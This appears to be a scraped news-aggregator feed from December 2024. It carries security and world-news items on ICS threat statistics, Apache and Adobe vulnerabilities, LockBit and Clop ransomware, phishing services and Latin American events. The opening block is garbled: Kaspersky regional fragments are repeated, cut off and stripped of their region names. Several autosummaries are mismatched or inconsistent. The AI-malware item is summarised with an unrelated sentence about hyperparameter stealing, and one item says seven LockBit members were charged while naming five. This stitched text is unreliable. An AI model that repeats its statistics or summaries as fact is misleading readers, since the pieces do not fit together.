From a global perspective , the following industries saw a higher percentage of ICS computers on which malicious objects were blocked : Construction – 1.3 times higher Electric power – 1.2 times higher Oil and gas – 1.2 times higher Building automation – 1.1 times higher Engineering & ICS Integration – 1.1 times higher , the following industries saw a of ICS computers on which malicious objects were blocked In Q3 2024, the electric power sector exhibited the most noticeable increase (by a factor of 1.1) in the percentage of ICS computers on which malicious objects were blocked, compared to the previous quarter. Comparative analysis South-East Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: viruses, malware for AutoCAD Second place: denylisted internet resources, threats from the internet, threats from network folders Third place: malicious spyware Threat categories Viruses came second in the ranking of malware categories by percentage of ICS computers on which they were blocked. Quarterly changes and trends Threat categories Compared to the previous quarter, the largest proportional increase was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. 
Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked : Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.4 times Malicious documents – by 1.2 times Ransomware – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.1 times Malicious documents – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages, by 1.1 times Denylisted internet resources, by 1.1 times The top threat categories exhibit various quarterly dynamics: The heat map below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD – by 1.8 times Malicious documents – by 1.3 times Malicious scripts and phishing pages – by 1.3 times Denylisted internet resources – by 1.2 times Viruses – by 1.1 times. 
Quarterly changes and trends Threat categories he largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher in was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.3 times Malicious scripts and phishing pages – by 1.2 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. 
Regions ranked by percentage of ICS computers on which spyware was blocked, Q3 2024 In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q3 2024 All regions ranked by percentage of ICS computers on which malicious objects were blocked in the third quarter can be divided into three groups: Over 25% Africa – 31.5% South-East Asia – 30% Middle East – 25.6% In the regions within this group, OT computers are generally overexposed to cyberthreats. "


    Threat landscape for industrial automation systems. Q3 2024

    industry
    2024-12-25 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q3-2024/
    The percentage of ICS computers on which malicious objects were blocked decreased by 1.5 pp from the second quarter to 22%. The biometrics sector led the surveyed industries in terms of this parameter. "

    Autosummary: This group includes Windows computers that serve one or several of the following purposes:
    Supervisory control and data acquisition (SCADA) servers
    Building automation servers
    Data storage (Historian) servers
    Data gateways (OPC)
    Stationary workstations of engineers and operators
    Mobile workstations of engineers and operators
    Human machine interface (HMI)
    Computers used to manage technological and building automation networks
    Computers of ICS/PLC programmers
    Computers that share statistics with us belong to organizations from various industries. The most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals.

    The phishing lures were distributed through various channels, including phishing emails (e.g., fake vulnerability notifications claiming to be from GitHub), malicious links, and malvertising networks found on adult sites, file sharing services, betting platforms, anime resources, and web apps that monetize through traffic.

    Q3 in numbers
    Parameter | Q2 2024 | Q3 2024 | Quarterly change
    Global percentage of attacked ICS computers | 23.5% | 22.0% | -1.5 pp
    Percentage of ICS computers on which malicious objects from different categories were blocked:
    Denylisted internet resources | 6.63% | 6.84% | 0.21 pp
    Malicious scripts and phishing pages (JS and HTML) | 5.69% | 6.24% | 0.55 pp
    Spy Trojans, backdoors and keyloggers | 4.08% | 3.91% | -0.17 pp
    Malicious documents (MSOffice + PDF) | 1.96% | 1.97% | 0.01 pp

    Percentage of ICS computers on which malicious objects were blocked, by month, 2022–2024
    Regionally*, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 9.7% in Northern Europe to 31.5% in Africa.
    Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022–2024
    Compared to the third quarter of 2023, the percentage decreased by 1.7 pp.
    Percentage of ICS computers on which malicious objects were blocked in selected industries

    Diversity of detected malicious objects
    Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "


    Iran's Charming Kitten Deploys BellaCPP: A New C++ Variant of BellaCiao Malware

    exploits
    2024-12-25 https://thehackernews.com/2024/12/irans-charming-kitten-deploys-bellacpp.html
    The Iranian nation-state hacking group known as Charming Kitten has been observed deploying a C++ variant of a known malware called BellaCiao. Russian cybersecurity company Kaspersky, which dubbed the new version BellaCPP, said it discovered the artifact as part of a "recent" investigation into a compromised machine in Asia that was also infected with the BellaCiao malware. BellaCiao was first "

    Autosummary: "


    Critical SQL Injection Vulnerability in Apache Traffic Control Rated 9.9 CVSS — Patch Now

    exploits
    2024-12-25 https://thehackernews.com/2024/12/critical-sql-injection-vulnerability-in.html
    The Apache Software Foundation (ASF) has shipped security updates to address a critical security flaw in Traffic Control that, if successfully exploited, could allow an attacker to execute arbitrary Structured Query Language (SQL) commands in the database. The SQL injection vulnerability, tracked as CVE-2024-45387, is rated 9.9 out of 10.0 on the CVSS scoring system. "An SQL injection "

    Autosummary: "


    Greenland and the Panama Canal aren't for sale. Why is Trump threatening to take them?

    latam
    2024-12-25 https://www.bbc.com/news/articles/c1lnzzd1zrmo
    Trump's promises to use America's strength to its advantage helped propel him twice to the White House. "

    Autosummary: While the statements might be "coercive", said Mr Freeman, it remained to be seen "whether canal authorities lower fees on US cargo in response to the threat". "


    Cybersecurity jobs available right now: December 24, 2024

    ciber
    2024-12-24 https://www.helpnetsecurity.com/2024/12/24/cybersecurity-jobs-available-right-now-december-24-2024/

    Application Security DevOps engineer Twixor | India | On-site – View job details As an Application Security DevOps engineer, you will implement and oversee application security measures to protect the company’s software and infrastructure. Conduct regular security assessments and vulnerability testing. Develop and maintain secure coding practices and standards. Design, implement, and maintain secure CI/CD pipelines. Perform threat modeling and risk assessments. Application Security Engineer Webster Bank | USA | On-site – View job details As … More

    The post Cybersecurity jobs available right now: December 24, 2024 appeared first on Help Net Security.

    "

    Autosummary: SOC Cyber Security Senior Analyst Honeywell | Romania | Hybrid – View job details As a SOC Cyber Security Senior Analyst, you will monitor SIEM, trouble tickets, email notifications, and in-person escalations, as well as logs from infrastructure components, applications, or network devices such as firewalls and IDS/IPS. Senior Cybersecurity Threat Intelligence Engineer Stratasys | Israel | On-site – View job details As a Senior Cybersecurity Threat Intelligence Engineer, you will lead proactive threat hunting initiatives to detect sophisticated cyber threats, attack vectors, and vulnerabilities across all environments (on-premises, cloud, hybrid). Threat Intelligence Analyst ASOS.com | United Kingdom | On-site – View job details As a Threat Intelligence Analyst, you will monitor and gather threat intelligence from an array of sources, including OSINT, dark web forums, industry feeds, and other relevant data sources. Head of Security Jade Software | New Zealand | On-site – View job details As a Head of Security, you will manage, maintain and continuously improve company-wide security risk management, compliance, and operational security processes. "


    2025 is going to be a bumpy year for IoT

    industry
    2024-12-24 https://www.helpnetsecurity.com/2024/12/24/iot-2025-security/

    In the Internet of Things (IoT) sector, 2025 is shaping up to be a politically charged year. Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. My advice for companies involved in manufacturing or using IoT devices? Prepare for the worst, but hope for the best. Geopolitical tensions are impacting IoT There’s no denying that the macro landscape is splintered. Internet infrastructure is … More

    The post 2025 is going to be a bumpy year for IoT appeared first on Help Net Security.

    "

    Autosummary: Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. Governments are kicking into action At the same time, and likely in response to the above, governments are introducing big legislative changes to encourage better device practices. "


    AI-driven scams are about to get a lot more convincing

    financial
    2024-12-24 https://www.helpnetsecurity.com/2024/12/24/cybercriminals-ai-scams/

    McAfee’s predictions for 2025 highlight emerging threats that consumers may encounter as cybercriminals exploit advanced AI technology. From hyper-realistic deepfakes and live video scams to AI-driven phishing, smishing, and malware attacks, these predictions reveal how cybercriminals are using AI-powered tools to craft increasingly sophisticated and personalized cyber scams. “As AI continues to mature and become increasingly accessible, cybercriminals are using it to create scams that are more convincing, personalized, and harder to detect,” said Abhishek … More

    The post AI-driven scams are about to get a lot more convincing appeared first on Help Net Security.

    "

    Autosummary: As cryptocurrency values climb and hype around the alternative currency increases, scammers are zeroing in on consumers’ digital wallets with fake investment schemes, phishing attacks, and malware designed to steal wallet keys, sell bogus crypto investments, or “pump and dump” – when scammers trick others into buying a cryptocurrency by hyping it up to inflate its price and then sell their shares for a profit when the price is high – causing the value to crash and leaving other investors with worthless assets. “As AI continues to mature and become increasingly accessible, cybercriminals are using it to create scams that are more convincing, personalized, and harder to detect,” said Abhishek Karnik, Head of Threat Research, McAfee. "


    Apache Tomcat Vulnerability CVE-2024-56337 Exposes Servers to RCE Attacks

    exploits
    2024-12-24 https://thehackernews.com/2024/12/apache-tomcat-vulnerability-cve-2024.html
    The Apache Software Foundation (ASF) has released a security update to address an important vulnerability in its Tomcat server software that could result in remote code execution (RCE) under certain conditions. The vulnerability, tracked as CVE-2024-56337, has been described as an incomplete mitigation for CVE-2024-50379 (CVSS score: 9.8), another critical security flaw in the same product that "

    Autosummary: "


    Apache Foundation fixed a severe Tomcat vulnerability

    exploits
    2024-12-24 https://securityaffairs.com/172273/security/apache-foundation-fixed-tomcat-flaw.html
    The Apache Software Foundation fixed a Tomcat server software flaw that could lead to remote code execution under certain conditions. The Apache Software Foundation (ASF) addressed an important vulnerability, tracked as CVE-2024-56337, in its Tomcat server software. The researchers warn that exploiting this vulnerability could result in remote code execution under certain conditions. Apache Tomcat […] "

    Autosummary: The CVE-2024-50379 mitigation was incomplete, requiring configuration based on Java version: Java 8/11: set sun.io.useCanonCaches to false (default is true). "


    Drug lord back in Colombia after 20 years in US jail

    latam
    2024-12-24 https://www.bbc.com/news/articles/c4gwv4lez6go
    Fabio Ochoa Vasquez completed his prison sentence in the US and returned home a free man. "

    Autosummary: "


    Brazil shuts BYD factory site over "slavery" conditions

    latam industry
    2024-12-24 https://www.bbc.com/news/articles/c8xj9jp57r2o
    More than 160 workers have been rescued, according to local prosecutors. "

    Autosummary: It added that it had conducted a "detailed review" of the working and living conditions for subcontracted employees, and asked on "several occasions" for the construction firm to make improvements. "


    Clop ransomware threatens 66 Cleo attack victims with data leak

    exploits ransomware
    2024-12-24 https://www.bleepingcomputer.com/news/security/clop-ransomware-threatens-66-cleo-attack-victims-with-data-leak/
    The Clop ransomware gang started to extort victims of its Cleo data theft attacks and announced on its dark web portal that 66 companies have 48 hours to respond to the demands. [...] "

    Autosummary: Clop achieves another major breach. The Cleo data theft attack represents another major success for Clop, which leveraged a zero-day vulnerability in Cleo LexiCom, VLTransfer, and Harmony products to steal data from the networks of breached companies. "


    CISA Adds Acclaim USAHERDS Vulnerability to KEV Catalog Amid Active Exploitation

    exploits
    2024-12-24 https://thehackernews.com/2024/12/cisa-adds-acclaim-usaherds.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a now-patched high-severity security flaw impacting Acclaim Systems USAHERDS to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The vulnerability in question is CVE-2021-44207 (CVSS score: 8.1), a case of hard-coded, static credentials in Acclaim USAHERDS that "

    Autosummary: "


    Clop ransomware is now extorting 66 Cleo data-theft victims

    exploits ransomware
    2024-12-24 https://www.bleepingcomputer.com/news/security/clop-ransomware-is-now-extorting-66-cleo-data-theft-victims/
    The Clop ransomware gang started to extort victims of its Cleo data theft attacks and announced on its dark web portal that 66 companies have 48 hours to respond to the demands. [...] "

    Autosummary: Clop achieves another major breach. The Cleo data theft attack represents another major success for Clop, which leveraged a zero-day vulnerability in Cleo LexiCom, VLTransfer, and Harmony products to steal data from the networks of breached companies. "


    Adobe is aware that ColdFusion bug CVE-2024-53961 has a known PoC exploit code

    exploits
    2024-12-24 https://securityaffairs.com/172281/security/adobe-coldfusion-flaw-poc.html
    Adobe released out-of-band security updates to address a critical ColdFusion vulnerability, and experts warn that PoC exploit code is available for it. Adobe released out-of-band security updates to address a critical vulnerability, tracked as CVE-2024-53961 (CVSS score 7.4), in ColdFusion. Experts warn of the availability of proof-of-concept (PoC) exploit code for this vulnerability. The vulnerability is an […] "

    Autosummary: Adobe released out-of-band security updates to address a critical ColdFusion vulnerability, and experts warn that PoC exploit code is available for it. "


    New botnet exploits vulnerabilities in NVRs, TP-Link routers

    exploits
    2024-12-24 https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/
    A new Mirai-based malware campaign is actively exploiting unpatched vulnerabilities in Internet of Things (IoT) devices, including DigiEver DS-2105 Pro DVRs. [...] "

    Autosummary: "Although employing complex decryption methods isn't new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators," comments Akamai. "


    Toxic spill fears follow deadly Brazil bridge collapse

    latam
    2024-12-24 https://www.bbc.com/news/articles/c8ew5g6n7xro
    Lorries containing pesticides and sulphuric acid plunged into the Tocantins river in the north of the country. "

    Autosummary: "


    Three shot dead as medics, journalists and police attacked at Haiti hospital

    industry
    2024-12-24 https://www.bbc.com/news/articles/cx2vpdnd2jmo
    Many others are injured when armed men fire at medical staff, police and reporters in Port-au-Prince. "

    Autosummary: "


    How companies can fight ransomware impersonations

    exploits ransomware
    2024-12-23 https://www.helpnetsecurity.com/2024/12/23/cybersecurity-measures-ransomware-impersonations-video/

    As these threat actors become increasingly strategic and harder to detect, organizations must take all measures to protect their data, including cybersecurity training. In this Help Net Security video, Rodman Ramezanian, Global Cloud Threat Lead at Skyhigh Security, discusses how companies can defend themselves against threats and be prepared for future ones.

    The post How companies can fight ransomware impersonations appeared first on Help Net Security.

    "

    Autosummary: "


    What open source means for cybersecurity

    ciber
    2024-12-23 https://www.helpnetsecurity.com/2024/12/23/open-source-security-2024-reports/

    With outdated and inadequately maintained components, along with insecure dependencies, the open-source ecosystem presents numerous risks that could expose organizations to threats. In this article, you will find excerpts from 2024 open-source security reports that can help your organization strengthen its software security practices. 70% of open-source components are poorly or no longer maintained Regardless of geographic origin, the average mid-size application has several disturbing trends leading to critical vulnerabilities. Open-source contributes 2 to 9 times … More

    The post What open source means for cybersecurity appeared first on Help Net Security.

    "

    Autosummary: "


    Microsoft fixes bug behind random Office 365 deactivation errors

    exploits
    2024-12-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-random-office-365-deactivation-errors/
    Microsoft has rolled out a fix for a known issue that causes random "Product Deactivated" errors for customers using Microsoft 365 Office apps. [...] "

    Autosummary: "


    NFT scammers charged for stealing $22 million through “rug pulls”

    financial
    2024-12-23 https://www.helpnetsecurity.com/2024/12/23/nft-scammers-charged-rug-pulls-vault-of-gems-roost-coin-moonportal/

    A six-count indictment was unsealed on Friday in Los Angeles charging two California men with defrauding investors of more than $22 million in cryptocurrency through a series of digital asset project “rug pulls,” a type of fraud scheme in which the creator of a nonfungible token (NFT) or other digital asset project solicits funds from investors for the project and then abruptly abandons the project and fraudulently retains investors’ funds. Both men were arrested on … More

    The post NFT scammers charged for stealing $22 million through “rug pulls” appeared first on Help Net Security.

    "

    Autosummary: Hay, Mayo, and others allegedly used these tactics with a variety of digital asset projects, including Vault of Gems, Faceless, Sinful Souls, Clout Coin, Dirty Dogs, Uncovered, MoonPortal, Squiggles, and Roost Coin. "


    Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service

    financial
    2024-12-23 https://thehackernews.com/2024/12/rockstar2fa-collapse-fuels-expansion-of.html
    An interruption to the phishing-as-a-service (PhaaS) toolkit called Rockstar 2FA has led to a rapid uptick in activity from another nascent offering named FlowerStorm. "It appears that the [Rockstar2FA] group running the service experienced at least a partial collapse of its infrastructure, with pages associated with the service no longer reachable," Sophos said in a new report published last "

    Autosummary: The most frequently targeted countries using FlowerStorm include the United States, Canada, the United Kingdom, Australia, Italy, Switzerland, Puerto Rico, Germany, Singapore, and India. "


    Top 10 Cybersecurity Trends to Expect in 2025

    ciber
    2024-12-23 https://thehackernews.com/2024/12/top-10-cybersecurity-trends-to-expect.html
    The 2025 cybersecurity landscape is increasingly complex, driven by sophisticated cyber threats, increased regulation, and rapidly evolving technology. In 2025, organizations will be challenged with protecting sensitive information for their customers while continuing to provide seamless and easy user experiences. Here’s a closer look at ten emerging challenges and threats set to shape the "

    Autosummary: Meanwhile, attackers create bots that behave like real users by mimicking human actions such as typing, clicking, or scrolling, making them difficult to detect using standard security methods. AI-driven attacks, such as deepfake impersonations and convincing phishing scams, are also likely to become more prevalent, making insider threats harder to detect. For example, in a recent attack on Ford, attackers exploited the company's supply chain to insert malicious code into Ford's systems, creating a backdoor that the attackers could use to expose sensitive customer data. These systems take into account user behavior, location, and device type to make intelligent, risk-based decisions about access control. The threat of insider attacks: Insider threats are expected to intensify in 2025 due to the continued rise of remote work, AI-powered social engineering, and evolving data privacy concerns. "


    US charges suspected LockBit ransomware developer

    exploits ransomware
    2024-12-23 https://www.helpnetsecurity.com/2024/12/23/us-charges-suspected-lockbit-ransomware-developer/

    The US Department of Justice has unsealed charges against Rostislav Panev, 51, a dual Russian and Israeli national, suspected of being a developer for the LockBit ransomware group. Panev was arrested in August 2024 and is currently in custody in Israel pending extradition. The charges “According to the superseding complaint, documents filed in this and related cases, and statements made in court, Panev acted as a developer of the LockBit ransomware group from its inception … More

    The post US charges suspected LockBit ransomware developer appeared first on Help Net Security.

    "

    Autosummary: The criminal complaint says that at the time of Panev’s arrest, Israeli law enforcement found on his computer: administrator credentials for a dark web online repository, where source code for multiple versions of the LockBit builder was stored, along with source code for LockBit’s StealBit data exfiltration tool; and access credentials for the LockBit control panel, an online dashboard maintained by LockBit developers for LockBit’s affiliates. The complaint also alleges that Panev was in contact with LockBit’s alleged primary administrator, Dimitry Yuryevich Khoroshev, aka LockBitSupp, and discussed work that needed to be done on the LockBit builder and control panel. "


    AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Cases

    exploits
    2024-12-23 https://thehackernews.com/2024/12/ai-could-generate-10000-malware.html
    Cybersecurity researchers have found that it's possible to use large language models (LLMs) to generate new variants of malicious JavaScript code at scale in a manner that can better evade detection. "Although LLMs struggle to create malware from scratch, criminals can easily use them to rewrite or obfuscate existing malware, making it harder to detect," Palo Alto Networks Unit 42 researchers "

    Autosummary: "Specifically, we show a hyperparameter stealing attack that can extract all layer configurations including the layer type, number of nodes, kernel/filter sizes, number of filters, strides, padding, and activation function," the researchers said.


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips

    ciber
    2024-12-23 https://thehackernews.com/2024/12/thn-weekly-recap-top-cybersecurity.html
    The online world never takes a break, and this week shows why. From ransomware creators being caught to hackers backed by governments trying new tricks, the message is clear: cybercriminals are always changing how they attack, and we need to keep up. Hackers are using everyday tools in harmful ways, hiding spyware in trusted apps, and finding new ways to take advantage of old security gaps.

    Autosummary: The list includes — CVE-2024-12727, CVE-2024-12728, CVE-2024-12729 (Sophos Firewall), CVE-2023-48788 (Fortinet FortiClient EMS), CVE-2023-34990 (Fortinet FortiWLM), CVE-2024-12356 (BeyondTrust Privileged Remote Access and Remote Support), CVE-2024-6386 (WPML plugin), CVE-2024-49576, CVE-2024-47810 (Foxit Software), CVE-2024-49775 (Siemens Opcenter Execution Foundation), CVE-2024-12371, CVE-2024-12372, CVE-2024-12373 (Rockwell Automation PowerMonitor 1000), CVE-2024-52875 (GFI KerioControl), CVE-2024-56145 (Craft CMS), CVE-2024-56050, CVE-2024-56052, CVE-2024-56054, CVE-2024-56057 (VibeThemes WPLMS), CVE-2024-12626 (AutomatorWP plugin), CVE-2024-11349 (AdForest theme), CVE-2024-51466 (IBM Cognos Analytics), CVE-2024-10244 (ISDO Software Web Software), CVE-2024-4995 (Wapro ERP Desktop), CVE-2024-10205 (Hitachi Ops Center Analyzer), and CVE-2024-46873 (Sharp router).
    📰 Around the Cyber World
    Recorded Future Gets Labeled "Undesirable" in Russia — Russian authorities have tagged U.S. threat intelligence firm Recorded Future as an "undesirable" organization, accusing it of participating in propaganda campaigns and cyberattacks against Moscow. "This being one," Recorded Future's chief executive, Christopher Ahlberg, wrote on X.
    "These tools enable capabilities such as keystroke logging, data exfiltration, security bypasses, and covert system control, suggesting that the campaign is part of a potentially prolonged espionage effort," Rapid7 said, describing it as an advanced and targeted threat. Some of the most impacted verticals included manufacturing, industrial control systems (ICS) equipment and engineering, transportation, communications, oil and gas, electric, and government.
    The group, first documented by Kaspersky back in early 2014, infected the company with malware such as FakeHMP, Careto2, and Goreto that are designed to harvest files, keystrokes, and screenshots; run shell commands; and deploy more malware.
    ⚡ Threat of the Week
    LockBit Developer Rostislav Panev Charged in the U.S. — Rostislav Panev, a 51-year-old dual Russian and Israeli national, has been charged in the U.S. for allegedly acting as the developer of the now-disrupted LockBit ransomware-as-a-service (RaaS) operation, netting about $230,000 between June 2022 and February 2024.
    HeartCrypt Packer-as-a-Service Operation Exposed — A new packer-as-a-service (PaaS) called HeartCrypt has been advertised for sale on Telegram and underground forums since February 2024 to protect malware such as Remcos RAT, XWorm, Lumma Stealer, and Rhadamanthys. "In HeartCrypt's PaaS model, customers submit their malware via Telegram or other private messaging services, where the operator then packs and returns it as a new binary," Palo Alto Networks Unit 42 said, adding it identified over 300 distinct legitimate binaries that were used to inject the malicious payload.


    Adobe warns of critical ColdFusion bug with PoC exploit code

    exploits
    2024-12-23 https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-bug-with-poc-exploit-code/
    Adobe has released out-of-band security updates to address a critical ColdFusion vulnerability with proof-of-concept exploit code. [...]



    FTC orders Marriott and Starwood to implement strict data security

    industry
    2024-12-23 https://www.bleepingcomputer.com/news/security/ftc-orders-marriott-and-starwood-to-implement-strict-data-security/
    The Federal Trade Commission (FTC) has ordered Marriott International and Starwood Hotels to define and implement a robust customer data security scheme following failures that led to massive data breaches. [...]



    U.S. CISA adds Acclaim Systems USAHERDS flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2024-12-23 https://securityaffairs.com/172255/hacking/u-s-cisa-acclaim-systems-usaherds-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Acclaim Systems USAHERDS flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Acclaim Systems USAHERDS vulnerability, tracked as CVE-2021-44207 (CVSS score: 8.1), to its Known Exploited Vulnerabilities (KEV) catalog. USAHERDS, developed by Acclaim Systems, is a web-based application designed to […]

    Autosummary: It is part of the AgraGuard suite of products, which includes USAHERDS, USALIMS, USAPlants, USAFoodSafety, and USAMeals, aimed at supporting agricultural and food safety operations.


    Week in review: MUT-1244 targets both security workers and threat actors, Kali Linux 2024.4 released

    Linux
    2024-12-22 https://www.helpnetsecurity.com/2024/12/22/week-in-review-mut-1244-targets-both-security-workers-and-threat-actors-kali-linux-2024-4-released/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos:
    MUT-1244 targeting security researchers, red teamers, and threat actors
    A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data.
    Kali Linux 2024.4 released! 14 new shiny tools added
    Kali Linux 2024.4 includes … More

    The post Week in review: MUT-1244 targets both security workers and threat actors, Kali Linux 2024.4 released appeared first on Help Net Security.


    Autosummary: Balancing security and user experience to improve fraud prevention strategies
    In this Help Net Security interview, Jennifer White, Senior Director for Banking and Payments Intelligence at J.D. Power, discusses how financial institutions can improve customer satisfaction during fraud resolution, covering proactive fraud prevention, clear communication, and empathetic issue resolution.


    US charged Dual Russian and Israeli National as LockBit Ransomware developer

    exploits ransomware rusia-ucrania
    2024-12-22 https://securityaffairs.com/172201/uncategorized/us-authorities-charged-lockbit-ransomware-developer.html
    US authorities charged a dual Russian and Israeli national for being a developer of the LockBit ransomware group. Rostislav Panev, 51, a dual Russian-Israeli national, was charged as a LockBit ransomware developer. Arrested in Israel, he awaits extradition to the U.S. Panev was arrested in Israel in August and is awaiting extradition to the U.S. […]

    Autosummary: “As alleged in the superseding complaint, at the time of Panev’s arrest in Israel in August, law enforcement discovered on Panev’s computer administrator credentials for an online repository that was hosted on the dark web and stored source code for multiple versions of the LockBit builder, which allowed LockBit’s affiliates to generate custom builds of the LockBit ransomware malware for particular victims.


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 25

    exploits
    2024-12-22 https://securityaffairs.com/172214/breaking-news/security-affairs-malware-newsletter-round-25.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.
    Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion
    Spyware distributed through Amazon Appstore
    BADBOX Botnet Is Back
    Supply Chain Attack on Rspack npm Packages Injects Cryptojacking Malware
    4.5 Million (Suspected) Fake Stars in GitHub: A Growing […]



    Trump threatens to try to regain control of Panama Canal

    latam
    2024-12-22 https://www.bbc.com/news/articles/c98l9wj67jgo
    It prompts a sharp rebuke from Panama's president, who says "every square metre" of the canal belongs to his country.

    Autosummary: Trump made his remarks in front of thousands at Turning Point's annual conference, one of the country's largest gatherings of conservative activists. President-elect Donald Trump has demanded Panama reduce fees on the Panama Canal or return it to US control, accusing the central American country of charging "exorbitant prices" to American shipping and naval vessels.


    Private plane crash in Brazil kills pilot and his family

    latam
    2024-12-22 https://www.bbc.com/news/articles/cx2p5nlyly7o
    The plane fell minutes after take-off, hitting an urban area in Rio Grande do Sul and injuring 17 people.

    Autosummary: Brazilian businessman Luiz Claudio Galeazzi, who was piloting the plane, was killed in the crash alongside his wife, three daughters and other family members, a statement from his company said.


    LockBit Developer Rostislav Panev Charged for Billions in Global Ransomware Damages

    exploits ransomware
    2024-12-21 https://thehackernews.com/2024/12/lockbit-developer-rostislav-panev.html
    A dual Russian and Israeli national has been charged in the United States for allegedly being the developer of the now-defunct LockBit ransomware-as-a-service (RaaS) operation since its inception in or around 2019 through at least February 2024. Rostislav Panev, 51, was arrested in Israel earlier this August and is currently awaiting extradition, the U.S. Department of Justice (DoJ) said in a

    Autosummary: With the latest arrest, a total of seven LockBit members – Mikhail Vasiliev, Ruslan Astamirov, Artur Sungatov, Ivan Gennadievich Kondratiev, Mikhail Pavlovich Matveev – have been charged in the U.S. Despite these operational setbacks, the LockBit operators appear to be plotting a comeback, with a new version LockBit 4.0 scheduled for release in February 2025. "Once a co-conspirator sold the data, Antonenko and others used Bitcoin as well as traditional bank and cash transactions to launder the proceeds in order to disguise their nature, location, source, ownership, and control," the DoJ noted in May 2020.


    Romanian national was sentenced to 20 years in prison for his role in NetWalker ransomware attacks

    exploits ransomware
    2024-12-21 https://securityaffairs.com/172182/cyber-crime/romanian-national-was-sentenced-to-20-years-netwalker-attacks.html
    Romanian national was sentenced to 20 years in prison for his role in NetWalker ransomware attacks, pleading guilty to fraud charges in June. Romanian national Daniel Christian Hulea, 30, was sentenced to 20 years in prison for his role in NetWalker ransomware attacks. Hulea pleaded guilty to computer fraud conspiracy and wire fraud conspiracy on […]

    Autosummary: “The Department of Justice today announced a coordinated international law enforcement action to disrupt a sophisticated form of ransomware known as NetWalker.” reads the press release published by DoJ. “NetWalker ransomware has impacted numerous victims, including companies, municipalities, hospitals, law enforcement, emergency services, school districts, colleges, and universities.


    New FlowerStorm Microsoft phishing service fills void left by Rockstar2FA

    financial
    2024-12-21 https://www.bleepingcomputer.com/news/security/new-flowerstorm-microsoft-phishing-service-fills-void-left-by-rockstar2fa/
    A new Microsoft 365 phishing-as-a-service platform called "FlowerStorm" is growing in popularity, filling the void left behind by the sudden shutdown of the Rockstar2FA cybercrime service. [...]

    Autosummary: To protect against phishing attacks, use multi-factor authentication (MFA) with AiTM-resistant FIDO2 tokens, deploy email filtering solutions, and use DNS filtering to block access to suspicious domains like .ru, .moscow, and .dev.


    AI is becoming the weapon of choice for cybercriminals

    ciber
    2024-12-20 https://www.helpnetsecurity.com/2024/12/20/ai-technologies-challenges-2024/

    AI changes how organizations look at cybersecurity
    GenAI is compromising security while promising efficiency
